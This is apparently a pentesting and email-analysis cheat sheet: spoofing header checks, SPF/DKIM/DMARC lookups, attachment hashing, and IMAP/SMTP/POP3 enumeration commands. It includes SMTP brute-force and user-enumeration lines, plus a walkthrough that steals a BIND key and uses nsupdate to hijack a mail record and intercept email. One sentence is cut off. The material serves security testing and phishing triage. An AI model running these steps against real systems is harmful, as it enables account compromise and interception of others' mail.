Email Analysis

Detecting malware in messages and checking whether they are phishing.

- [email-spoofing](https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/email-spoofing/)

OSINT

Email Source Analysis

We can view the email source in each provider, or run the following commands on a saved message (.eml) file.

open example.eml
strings example.eml

Check the following headers to distinguish whether it is spoofed.

Authentication-Results

Each of the dkim, spf and dmarc values should be pass. If any of them is not, the email may be spoofed.

Received

The sending server recorded here should match the sender’s email address.

Received-SPF

Its value should be pass. If its value is fail, softfail, neutral or none, the email may be spoofed.

Others

Besides, check whether the displayed sender name or address matches the From, Reply-To and Return-Path headers. However, attackers can modify these header values, so they cannot be relied on completely.

Check SPF, DKIM, DMARC Records of Domain

To confirm whether these records exist for a domain, use the dig command. If they do not exist, the domain may be spoofed, or its mail may be categorized as spam by some email providers.

dig example.com txt

We can also check them using online tools such as MxToolbox.

SPF Record

dig example.com txt

# output example:
example.com.  IN  TXT  "v=spf1 include:spf.example.com -all"
example.com.  IN  TXT  "v=spf1 +ip4:10.0.0.1/24 -all"
example.com.  IN  TXT  "v=spf1 a:mail.example.com -all"
example.com.  IN  TXT  "v=spf1 -all"
example.com.  IN  TXT  "v=spf1 mx -all"

Check DKIM Record

dig selector._domainkey.example.com txt

# output examples:
selector._domainkey.example.com.  IN  TXT  "k=rsa; p=J8eTBu224i086iK"
selector._domainkey.example.com.  IN  TXT  "v=DKIM1; p=ABC...123;"

To check the DKIM record, we need to specify the DKIM selector. It can be found in the s= value of the dkim section of an email header such as Authentication-Results. For example,

Authentication-Results: mx.google.com;
  dkim=pass header.i=@example.com header.s=s1234 header.b=ABCDEF123

In this case, we execute dig s1234._domainkey.example.com txt .

Check DMARC Record

dig _dmarc.example.com txt

# output examples:
_dmarc.example.com.  IN  TXT  "v=DMARC1; p=reject; rua=mailto:mailauth-reports@example.com"
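As an added example that is not part of the original notes, the following Python assesses SPF, DMARC and DKIM TXT strings like the dig outputs above and flags the weak or missing settings this section warns about. The record strings are passed in as constructed input (the ones shown above), not fetched with dig.

```python
import re

def parse_spf(txt):
    """Split an SPF record into (qualifier, mechanism) pairs; '+' is the default qualifier."""
    terms = txt.split()
    if not terms or terms[0].lower() != "v=spf1":
        return None
    out = []
    for term in terms[1:]:
        if "=" in term and term[0] not in "+-~?":
            continue  # modifiers such as redirect= or exp= are not mechanisms
        qual = term[0] if term[0] in "+-~?" else "+"
        out.append((qual, term.lstrip("+-~?").lower()))
    return out

def parse_dmarc(txt):
    """Parse 'v=DMARC1; p=reject; rua=...' into a tag dictionary."""
    tags = dict(t.strip().split("=", 1) for t in txt.split(";") if "=" in t)
    return tags if tags.get("v", "").upper() == "DMARC1" else None

def assess(spf_txt, dmarc_txt, dkim_txt):
    """Flag weak or missing settings; an empty list means the records look sound."""
    findings = []
    spf = parse_spf(spf_txt) if spf_txt else None
    if spf is None:
        findings.append("no SPF record: receivers cannot verify the sending host")
    else:
        all_qual = next((q for q, m in spf if m == "all"), None)
        if all_qual is None:
            findings.append("SPF has no 'all' term: unlisted senders get a neutral result")
        elif all_qual in "+?":
            findings.append(f"SPF ends with '{all_qual}all': any host may send for the domain")
        elif all_qual == "~":
            findings.append("SPF ends with '~all': softfail only, forged mail is still accepted")
    dmarc = parse_dmarc(dmarc_txt) if dmarc_txt else None
    if dmarc is None:
        findings.append("no DMARC record: SPF/DKIM failures trigger no policy")
    elif dmarc.get("p", "none").lower() == "none":
        findings.append("DMARC p=none: failures are only reported, never rejected")
    # A usable DKIM record carries a non-empty p= public key at the selector.
    if not dkim_txt or not re.search(r"\bp=[A-Za-z0-9+/]+", dkim_txt):
        findings.append("no DKIM public key at the selector: signatures cannot be verified")
    return findings
```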

Be Careful of Fake Reply Message

If the subject contains RE: (Regarding), which indicates a reply to your message, we need to check that it is really a reply. An attacker may forge a reply to a conversation the victim had in the past.
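The header checks above (Authentication-Results, Received-SPF, agreement of From, Reply-To and Return-Path, and a RE: subject that is not a genuine reply) as an added Python example that is not part of the original notes. The .eml text is constructed, and the In-Reply-To/References test for the fake-reply case is an added heuristic, not something the notes state.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample (not a real capture): every indicator in the notes above fires.
SAMPLE_EML = """\
Return-Path: <bounce@bulk-sender.test>
Authentication-Results: mx.google.com;
  dkim=none header.i=@example.com;
  spf=softfail smtp.mailfrom=bounce@bulk-sender.test;
  dmarc=fail header.from=example.com
Received-SPF: softfail (mx.google.com: domain is transitioning)
From: "IT Helpdesk" <helpdesk@example.com>
Reply-To: helpdesk@bulk-sender.test
Subject: RE: Password reset request
"""

def domain_of(value):
    """Lowercase domain of an address header value, '' if absent."""
    addr = parseaddr(str(value or ""))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

def spoofing_indicators(raw):
    """Return the spoofing indicators found in the raw .eml text."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    # Authentication-Results: dkim, spf and dmarc should all be 'pass'.
    auth = " ".join(str(h) for h in msg.get_all("Authentication-Results", []))
    for mech in ("dkim", "spf", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        result = m.group(1).lower() if m else "missing"
        if result != "pass":
            findings.append(f"{mech}={result}")
    # Received-SPF: fail, softfail, neutral or none all count as suspect.
    rspf = str(msg.get("Received-SPF") or "").split(" ", 1)[0].lower()
    if rspf != "pass":
        findings.append(f"received-spf={rspf or 'missing'}")
    # From, Reply-To and Return-Path domains should agree.
    from_dom = domain_of(msg.get("From"))
    for hdr in ("Reply-To", "Return-Path"):
        dom = domain_of(msg.get(hdr))
        if dom and dom != from_dom:
            findings.append(f"{hdr} domain {dom} != From domain {from_dom}")
    # A 'RE:' subject with no In-Reply-To/References header is not a real reply.
    is_reply = msg.get("In-Reply-To") or msg.get("References")
    if re.match(r"\s*re:", str(msg.get("Subject", "")), re.I) and not is_reply:
        findings.append("subject says RE: but no In-Reply-To/References header")
    return findings
```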

Malware Detection in Attached Files

If you receive an email with suspicious attached files, you need to investigate them.

  1. View the Message Source

  2. Copy the Attached File's Base64

  3. Change the Base64 to SHA256

    # if the attachment has already been saved as a file
    sha256sum attached_file.doc
    # or decode the Base64 copied from the message source first, then hash the decoded file
    # (hashing the Base64 text itself would give a different digest from the file's)
    echo -n 'abcde..==' | base64 -d > attached_file.doc
    sha256sum attached_file.doc

    Or there are some useful tools:

  4. Investigate the Hash

    There are some useful tools:
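Steps 1 to 4 done programmatically, as an added example that is not from the original notes: parse a saved .eml, decode each Base64 attachment and compute the SHA256 of the decoded bytes (the value to look up), plus a helper showing why hashing the Base64 text itself gives a different digest. The message is constructed.

```python
import base64
import email
import hashlib
from email import policy

# Constructed sample (not a real capture): one Base64-encoded attachment.
SAMPLE_EML = """\
From: sender@example.com
To: victim@example.com
Subject: Invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain

See attached.
--BOUNDARY
Content-Type: application/octet-stream; name="invoice.txt"
Content-Disposition: attachment; filename="invoice.txt"
Content-Transfer-Encoding: base64

aGVsbG8K
--BOUNDARY--
"""

def sha256_of_base64(b64_text, decode=True):
    """SHA256 of the attachment carried by a Base64 string copied from the source.
    decode=False reproduces the mistake of hashing the Base64 characters instead
    (what `echo -n '...' > hash.txt; sha256sum hash.txt` computes), which never
    matches the real file's hash."""
    data = base64.b64decode(b64_text) if decode else b64_text.encode()
    return hashlib.sha256(data).hexdigest()

def attachment_hashes(raw):
    """Decode every attachment of a raw .eml and return (filename, size, sha256)."""
    msg = email.message_from_string(raw, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True)  # undoes the Base64 transfer encoding
        if not data:
            continue
        name = part.get_filename() or "(unnamed)"
        results.append((name, len(data), hashlib.sha256(data).hexdigest()))
    return results
```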

IMAP (Internet Message Access Protocol) Pentesting

IMAP is an internet standard protocol used by email clients. Default ports are 143, 993.

Enumeration

nmap --script imap-capabilities -p 143 <target-ip>
nc -nv <target-ip> 143
openssl s_client -connect <IP>:993 -quiet

Connect

telnet 10.0.0.1 143

Commands

# Login
a1 login "<username>" "<password>"

# Logout
a1 logout

# Close mailbox
a1 close

SMTP (Simple Mail Transfer Protocol) Pentesting

SMTP is used for sending e-mail; POP3 or IMAP are used for receiving it. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS).

Enumeration

nmap --script smtp-brute -p 25,465,587 <target-ip>
nmap --script smtp-commands -p 25,465,587 <target-ip>
nmap --script smtp-enum-users -p 25,465,587 <target-ip>
nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 <target-ip>
nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 <target-ip>
nmap --script smtp-* -p 25,465,587 <target-ip>

MX Domains

dig mx example.com

Users

# VRFY - check if the user exists in the SMTP server
smtp-user-enum -M VRFY -u <username> -t <target-ip>
smtp-user-enum -M VRFY -U usernames.txt -t <target-ip>

# RCPT - check if the user is allowed to receive mails in the SMTP server
smtp-user-enum -M RCPT -u <username> -t <target-ip>
smtp-user-enum -M RCPT -U usernames.txt -t <target-ip>

# EXPN - reveal the actual email address
smtp-user-enum -M EXPN -u <username> -t <target-ip>
smtp-user-enum -M EXPN -D <hostname> -U usernames.txt -t <target-ip>

STARTTLS

# Port 25
openssl s_client -starttls smtp -connect <target-ip>:25
# Port 465
openssl s_client -crlf -connect <target-ip>:465
# Port 587
openssl s_client -starttls smtp -crlf -connect <target-ip>:587

Connect

nc <target-ip> 25
# or
telnet <target-ip> 25

Commands

Commands are not case sensitive.

EHLO - list all supported enhanced functions

ehlo example.com

Messages

# 1. check if the user exists
vrfy <username>
vrfy root

# 2. set the address of the mail sender
mail from: <username>
mail from: root
mail from: sender@example.com

# 3. set the address of the mail recipient
rcpt to: <username>
rcpt to: root
rcpt to: recipient@example.com

# 4. send the message data (the message ends with a line containing only ".")
data
subject: Test Mail
This is a test mail.
.

Others

# process remote queue
etrn example.com

# list the mailing list
expn example.com

Send Mails from External

swaks is a swiss army knife for SMTP.

swaks --to remote-user@example.com --from local-user@<local-ip> --server mail.example.com --body "hello"

Start SMTP Server

# -n: No setuid
# -c: Classname
# Note: the smtpd module was deprecated in Python 3.6 and removed in Python 3.12;
# on newer interpreters use the third-party aiosmtpd package instead.
sudo python3 -m smtpd -n -c DebuggingServer 10.0.0.1:25

Receive Email as Another Address

With misconfigurations in the target system, we might be able to impersonate an email address and then receive sensitive email.

Exploit DNS Zone Misconfiguration & BIND Config

If the target host has a domain for email, e.g. “mail.example.com”, and we can obtain the BIND secret key, we can update

1. Get BIND Secret Key

We need to get the BIND key from the config file.

# /etc/bind/named.conf

key "rndc-key" {
    algorithm hmac-sha256;
    secret "zBatC828gunRa...bA=";
};

2. Update DNS Zone

After retrieving the BIND secret, update the DNS zone to add a new record for receiving email, with the subdomain and our IP address.

# -d: Debug mode
# -y: Set the literal TSIG (Transaction Signature) authentication key.
nsupdate -d -y hmac-sha256:rndc-key:zBatC828gunRa...bA= 
Creating key...
namefromtext
keycreate
# Enter target domain
> server example.com
# Enter the new record
# 86400: The TTL (Time-To-Live) for the DNS record. Set 86400 seconds (24 hours) here.
# IN: Internet
# A: A record
# 10.0.0.1: Set your local ip address
> update add mail.example.com 86400 IN A 10.0.0.1
> send
Reply from SOA query:
...

3. Start SMTP Server

On the local machine, start an SMTP server for debugging so that email sent to “mail.example.com” by others is received there.

# -n: No setuid
# -c: Classname
sudo python3 -m smtpd -n -c DebuggingServer 10.0.0.1:25

When receiving email, we should see the output in the terminal.

POP (Post Office Protocol) Pentesting

Post Office Protocol is an application-layer protocol used by email clients. POP3 is a commonly used version. Default ports are 110, 995.

Enumeration

nmap --script "pop3-capabilities or pop3-ntlm-info" -p 110 <target-ip>

Connect

nc <target-ip> 110
# or
telnet <target-ip> 110

Commands

# Login
USER <username>
PASS <password>

# Number and total size of all messages
STAT
# List messages and size
LIST
# Retrieve the message of given number
RETR <number>
# Delete the message of given number
DELE <number>
# Reset the mailbox
RSET
# Exit the mail server
QUIT